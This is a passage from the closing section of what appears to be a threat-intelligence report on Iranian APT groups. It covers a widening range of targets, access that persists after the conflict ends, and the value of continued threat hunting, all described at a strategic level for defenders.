  5. The targeting envelope is now significantly broader than direct conflict participants. Organizations in Europe, Canada, Australia, and the Gulf with financial, supply chain, or infrastructure exposure to the Middle East face elevated risk regardless of their governments' direct involvement in the conflict. The decision to target an organization is increasingly driven by symbolic value, sector, and opportunism rather than strict geopolitical alignment.
  6. The conflict's cyber dimension will outlast its kinetic phase. Iranian APT groups do not stand down when missiles stop flying — they retool and maintain access. Organizations compromised during a period of heightened activity may carry dormant Iranian footholds into subsequent periods. Post-conflict threat hunting should be as thorough as in-conflict response.

Iran's cyber program has demonstrated consistent investment, adaptability, and patience across two decades of documented operations. The current period — marked by the most significant geopolitical escalation the program has operated through — is neither the beginning nor the end of that trajectory. The groups profiled here will continue to operate, evolve their tooling, and pursue their institutional mandates regardless of how the immediate conflict resolves. The organizations best positioned to withstand that sustained pressure are those that treat Iranian APT risk as a persistent structural condition rather than a crisis-period anomaly.
